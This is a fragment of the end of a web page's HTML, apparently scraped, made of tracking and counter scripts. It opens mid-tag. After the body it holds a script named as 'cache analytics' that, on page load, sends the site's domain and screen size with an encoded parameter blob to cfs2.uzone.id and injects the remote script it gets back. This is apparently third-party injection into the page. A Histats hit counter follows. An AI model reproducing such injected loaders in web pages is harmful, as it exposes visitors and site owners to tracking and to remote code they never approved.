            type="text/javascript">if (self == top) { function netbro_cache_analytics(fn, callback) { setTimeout(function () { fn(); callback(); }, 0); } function sync(fn) { fn(); } function requestCfs() { var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://"); var idc_glo_r = Math.floor(Math.random() * 99999999999); var url = idc_glo_url + "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssK3qeoH37Z7X6nQ0bBKlOK86b%2bfYerQqhFsl%2bl6KUGZK9A4EjohCAiBqQL1K2Rnva8FyRjR2%2bJkMO2xSE95JKx8IApYMasqO%2f2bE%2fTYyDDWmGH%2b9YL9ZkvfqlEdZ%2bqRpHyZxZxT%2b7TkVxypYIg9pHKVi4yDywfrH7z3kvGWdeJ13Tsl%2fTBKgGxRhApJ5ud0AhqkkFYAOlECumwQmQTeqVUcbWRLMuE0IeB185pJldV3aO4AK%2f5%2fCnNUHwb7g9KXn7nPZMJm1rgn9qOXDOxKhyxoe36jlVWdok8fcHfnYfvW0foWGmj3K8k06mJGtr3sxKifgNq8bye6tMtQ%2f14kBjOQ94X1WQJiDiz%2fF1uencgXgrCvpR3bBYPf0Inv4l5ooADTcz%2fAMS9meEj6%2bT8nKlWMeOuMjf7ptP4%2f9oCN9gYue41AeO2wpl4zFzlif2sTxk948dhu3PSe6uxJJvF0XtN3g%3d%3d" + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height; var bsa = document.createElement('script'); bsa.type = 'text/javascript'; bsa.async = true; bsa.src = url; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa); } netbro_cache_analytics(requestCfs, function () { }); };</script>
</body>

</html>
<!-- Histats.com  (div with counter) -->
<div id="histats_counter"></div>
<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4454364,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4454364&101" alt="counter create hit" border="0"></a></noscript>
<!-- Histats.com  END  -->